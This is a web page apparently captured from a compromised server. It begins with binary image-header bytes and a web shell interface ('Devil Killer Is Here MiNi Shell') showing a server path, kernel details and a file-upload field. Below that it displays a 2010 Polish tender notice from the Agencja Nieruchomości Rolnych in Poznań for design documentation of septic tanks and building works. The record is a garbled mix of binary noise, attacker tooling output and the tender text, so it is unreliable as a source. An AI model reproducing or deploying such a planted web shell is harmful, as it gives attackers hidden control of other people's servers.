JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100309/52029-N-2010.html

<p class="kh_header"><b>Poznań: Wykonanie dokumentacji projektowo - kosztorysowych - numer postępowania 0160/POZ/8/2010</b><br>
<b>Numer ogłoszenia: 52029 - 2010; data zamieszczenia: 09.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy , ul. Fredry 12, 61-701 Poznań, woj. wielkopolskie, tel. 061 8560681, faks 061 8515092.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo - kosztorysowych - numer postępowania 0160/POZ/8/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego i instalacji wod-kan w miejscowości Chudobczyce nr 14 i 15 gmina Kwilcz.
Część II: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane  na budowę zbiornika bezodpływowego  i instalacji wod-kan w miejscowości Międzychód nr 16 gmina Dolsk.
Część III: opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy prawo budowlane na budowę zbiornika bezodpływowego w miejscowości Grubsko nr 17 gmina Nowy Tomyśl.
Część IV: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego i instalacji wod-kan w miejscowości Konin nr 3/10, 11, 12 gmina Lwówek.
Część V: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane  na budowę zbiornika bezodpływowego i instalacji wod-kon w miejscowości Włościejewki nr 8 gmina Książ Wlkp.
Część VI: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego  i instalacji wod-kan w miejscowości Lewice nr 30 gmina Międzychód.
Część VII: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego w miejscowości Konarskie nr 6 gmina Książ Wlkp.
Część VIII: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego w miejscowości Włościejewki nr 10 gmina Książ Wlkp.
Część IX: Opracowanie dokumentacji projektowo-kosztorysowej  oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane  na wykonanie trzech osiedlowych oczyszczalni ścieków oraz sieci kanalizacyjnych w miejscowościach: Ostrowo, Marzenin, Kawęczyn gmina Września.
Część X: Opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane dla wykonania pięciu instalacji c.o.  z kotłami gazowymi dwufunkcyjnymi budynku mieszkalnym z lokalem administracyjnym w Środzie Wlkp. ul. Daszyńskiego 11.
Część XI: Opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na wykonanie podziemnych zbiorników bezodpływowych dla osiedla mieszkaniowego we Wszołowie gmina Gołuchów wraz z siecią i przyłączami do budynków.
Część XII: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na roboty budowlane w budynku oficyny w miejscowości Chwałkowie 2 gmina Strzałkowo.
Część XIII: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na roboty budowlane budynku mieszkalnego Biela 14, gm. Wilczyn.
Część XIV: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na roboty budowlane budynku mieszkalnego Bogusławice 85c, gm. Babiak.
Część XV: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na roboty budowlane budynku mieszkalnego Żeroniczki 4, gm. Przykona.
Część XVI: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na roboty budowlane budynku mieszkalnego Sompolno, ul. Polna 43.
Część XVII: Opracowanie dokumentacji projektowo-kosztorysowej  oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na remont budynku mieszkalnego w miejscowości Szołdry nr 15.
Część XVIII: opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy prawo budowlane na modernizację, adaptację budynku biurowo-mieszkalnego na lokale mieszkalne w miejscowości Sokołowo ul. Szlachecka nr 4.
Część XIX: Opracowanie dokumentacji projektowej na przyłącze energetyczne, wodociągowe i przebudowa wejścia do sąsiedniego  budynku mieszkalnego nr 10 oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane - budynku mieszkalnego (rządówka) w miejscowości Bugaj gmina Miłosław.
Część XX: Opracowanie dokumentacji projektowo-kosztorysowej  oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane dla dokończenia remontu kotłowni węglowej i komina ceramicznego w miejscowości Marzenin gmina Września.
Część XXI: Sporządzenie ekspertyzy oraz dokumentacji projektowo-kosztorysowej na wykonanie remontu dachu, ścian i odwodnienia terenu wokół budynku kaplicy w miejscowości Uchorowo gmina Murowana Goślina.
Część XXII: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na wykonanie rozbiórki miejscowości Orle Wielkie gmina Chrzypsko Wielkie.
Część XXIII: Wykonanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę oczyszczalni ścieków z uwzględnieniem rozbiórki  starej oczyszczalni ścieków w miejscowości Garzyn gmina Krzemieniewo.
Część XXIV: Opracowanie dokumentacji projektowo-kosztorysowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na remont pokrycia dachu, konstrukcji dachu oraz stropu budynku mieszkalnego w miejscowości Górzno gmina Ostrów Wlkp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 24.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobą projektanta posiadającą niezbędne uprawnienia budowlane wymagane przepisami ustawy Prawo budowlane w specjalności niezbędnej do wykonania poszczególnych części zamówienia na które Wykonawca składa ofertę.
Projektant jest członkiem właściwej izby samorządu zawodowego.
Dokonanie oceny spełniania warunków polegać będzie na sprawdzeniu przez Zamawiającego, czy na podstawie dostarczonych przez Wykonawcę dokumentów i oświadczeń można dopuścić go do postępowania o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wprowadzenia zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2. Wprowadzone zmiany będą dotyczyć umówionego terminu wykonania zamówienia.
3. Zmiany będące następstwem działania organów administracji w szczególności:
a) przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp.
b) odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek dodatkowych wymagań nałożonych przez te organy,
c) inne przyczyny zewnętrzne niezależne od zamawiającego i wykonawcy skutkujące niemożliwością uzyskania stosownych decyzji, zezwoleń, uzgodnień itp. 
W przypadku wystąpienia którejkolwiek okoliczności wymienionych w pkt. 3 termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty, nie dłużej jednak jak o okres trwania tych okoliczności. Ciężar udowodnienia faktu w takim układzie spoczywa na wykonawcy przedmiotowego zamówienia.
4. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien poinformować Zamawiającego pisemnie.
5. Zmiany osobowe:
Zmiana osób, przy pomocy których wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także w SIWZ.
Wykonawca może dokonać zmiany osób przedstawionych w ofercie, jedynie za uprzednią zgodą zamawiającego w przypadkach:       
a) śmierci, choroby lub innych zdarzeń losowych osób,
b) nie wywiązywania się osób z obowiązków wynikających z umowy,
c) rezygnacji tych osób z wykonywania swoich obowiązków.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Fredry 12, 61-701 Poznań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2010 godzina 08:00, miejsce: Agencja Nieruchomości Rolnych ul. Fredry 12, 61-701 Poznań pok. 215.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego i instalacji wod-kan w miejscowości Chudobczyce nr 14 i 15 gmina Kwilcz..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane  na budowę zbiornika bezodpływowego 2 x 10 m3  i instalacji wod-kan w miejscowości Chudobczyce nr 14, 15 gmina Kwilcz, działka nr 35/3, zgodnie z Decyzją Nr 39/2008 o warunkach zabudowy z dnia 25.08.2008, stanowiącą złącznik nr 3A do SIWZ.
Zakres opracowania dokumentacji:
- montaż zbiornika bezodpływowego,
- przyłącze kanalizacyjne,
- utwardzenie drogi dojazdowej w celu opróżnienia zbiornika 
- oraz inne niezbędne roboty niezbędne w celu prawidłowego użytkowania zbiornika.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Ryszard Stefaniak tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane  na budowę zbiornika bezodpływowego  i instalacji kanalizacyjnej w miejscowości Międzychód nr 16 gmina Dolsk..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego 2 x 20m3  i instalacji kanalizacyjnej w miejscowości Międzychód nr 16 gmina Dolsk, działka nr 52/2, zgodnie z Decyzją o warunkach zabudowy z dnia 30.09.2009 RG/GT/7331/64/09 stanowiącą załącznik nr 3B do SIWZ.
Zakres opracowania dokumentacji:
- montaż zbiornika bezodpływowego,
- przyłącze kanalizacyjne,
- utwardzenie drogi dojazdowej w celu opróżnienia zbiornika 
- oraz inne niezbędne roboty niezbędne w celu prawidłowego użytkowania zbiornika.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Ryszard Stefaniak tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III: opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy prawo budowlane na budowę zbiornika bezodpływowego w miejscowości Grubsko nr 17 gmina Nowy Tomyśl..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego 1 x 10m3  w miejscowości Grubsko 17 gmina Nowy Tomyśl, działka  nr 77, zgodnie z Decyzją o warunkach zabudowy Nr 85/2009 z dnia 01.04.2009, stanowiącą załącznik nr 3C do SIWZ.
Zakres opracowania dokumentacji:
- montaż zbiornika bezodpływowego,
- przyłącze kanalizacyjne,
- utwardzenie drogi dojazdowej w celu opróżnienia zbiornika 
- oraz inne niezbędne roboty niezbędne w celu prawidłowego użytkowania zbiornika.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Ryszard Stefaniak tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego i instalacji kanalizacyjnej w miejscowości Konin nr 3/10, 11, 12 gmina Lwówek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego 3 x  6m3  i instalacji kanalizacyjnej w miejscowości Konin nr 3/10, 11, 12 gmina Lwówek, działka nr 277/2, zgodnie z Decyzją Nr 80/08 o warunkach zabudowy z dnia 18.11.2010; stanowiącą załącznik nr 3D do SIWZ.
Zakres opracowania dokumentacji:
- montaż zbiornika bezodpływowego,
- przyłącze kanalizacyjne,
- utwardzenie drogi dojazdowej w celu opróżnienia zbiornika 
- oraz inne niezbędne roboty niezbędne w celu prawidłowego użytkowania zbiornika.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Ryszard Stefaniak tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane  na budowę zbiornika bezodpływowego i instalacji kanalizacyjnej w miejscowości Włościejewki nr 8 gmina Książ Wlkp..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego 1 x 10m3  i instalacji kanalizacyjnej w miejscowości Włościejewki nr 8 gmina Książ Wlkp., działka nr 125/2, zgodnie z Decyzją Nr 7331/86/86/2008 o warunkach zabudowy z dnia 30.10.2008; stanowiącą załącznik nr 3E do SIWZ.
Zakres opracowania dokumentacji:
- montaż zbiornika bezodpływowego,
- przyłącze kanalizacyjne,
- utwardzenie drogi dojazdowej w celu opróżnienia zbiornika 
- oraz inne niezbędne roboty niezbędne w celu prawidłowego użytkowania zbiornika.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Ryszard Stefaniak tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego  i instalacji wod-kan w miejscowości Lewice nr 30 gmina Międzychód..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego  1 x 7,0m3  i instalacji wod-kan w miejscowości Lewice nr 30 gmina Międzychód, działka nr 201/6, zgodnie z Decyzją o warunkach zabudowy Nr GPN 7331/141/08 z dnia 06.02.2008; stanowiącą załącznik Nr 3F do SIWZ.
Zakres opracowania dokumentacji:
- montaż zbiornika bezodpływowego,
- przyłącze kanalizacyjne,
- utwardzenie drogi dojazdowej w celu opróżnienia zbiornika 
- oraz inne niezbędne roboty niezbędne w celu prawidłowego użytkowania zbiornika.
Osoba do kontaktu w sprawie przedmiotu zamówienia: Ryszard Stefaniak tel. 608511555..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII: Opracowanie dokumentacji projektowej oraz uzyskanie pozwoleń wynikających z ustawy Prawo budowlane na budowę zbiornika bezodpływowego i instalacji kanalizacyjnej w miejscowości Konarskie nr 6 gmina Książ Wlkp..</p>
